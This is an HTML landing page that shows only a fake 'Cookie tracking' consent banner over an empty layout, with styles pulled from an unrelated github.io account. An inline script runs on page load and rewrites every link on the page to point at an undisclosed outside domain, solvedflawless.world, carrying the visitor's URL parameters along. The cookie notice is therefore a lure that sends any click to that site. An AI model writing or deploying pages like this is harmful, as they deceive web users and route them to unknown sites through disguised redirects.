<!DOCTYPE html>

<html lang="DE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Cookie tracking</title>
   
    <link href="https://shephienloumondejar.github.io/shep/index_files/bootstrap.min.css" rel="stylesheet">
    <link href="https://shephienloumondejar.github.io/shep/index_files/style.css" rel="stylesheet">
    <link href="https://shephienloumondejar.github.io/shep/index_files/style-form.css" rel="stylesheet">

    <script>
  document.addEventListener('DOMContentLoaded', () => {
    var links = document.getElementsByTagName('a');
    var getParams = window.location.search.substr(1); // Get url params with removed '?' at the beginning of the string
    for (var i = 0; i < links.length; i++) {
      links[i].href = 'https://solvedflawless.world?' + getParams
    }
  });
</script>

   </head>

<body>
    
    <!--  Clickcease.com tracking-->
    <section id="formModal" class="overflow-auto sign-up-container" style="display: block;">
        <form action="clickurlhere">

            <h3>Cookie tracking</h3>
            <p>In order to optimize our website for you and to be able to continuously improve it, we use cookies. Please agree to the use of cookies.</p>
            <a class="button3" id="formModalButton"><span>→</span>I accept</a>
            
        </form>
    </section>
    <nav class="navbar navbar-expand-lg">
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <a href="clickurlhere" class=""></a>
        <div class="collapse navbar-collapse" id="navbarNav">
        </div>
    </nav>
    <div class="container-fluid header-block">
        <div class="container">
            <div class="row">
                <div class="col-md-8">
                    <br><br>
                    <br><br>
                    <br><br>    <br><br>
                    <br><br>
                    <br><br>
                  
                   
                   	<br><br>
                   	<br><br>
                   	<br><br>
                   	<br><br>
                   	<br><br>
                   	<br>
                </div>
                
            </div>
        </div>
    </div>
   




</body></html>
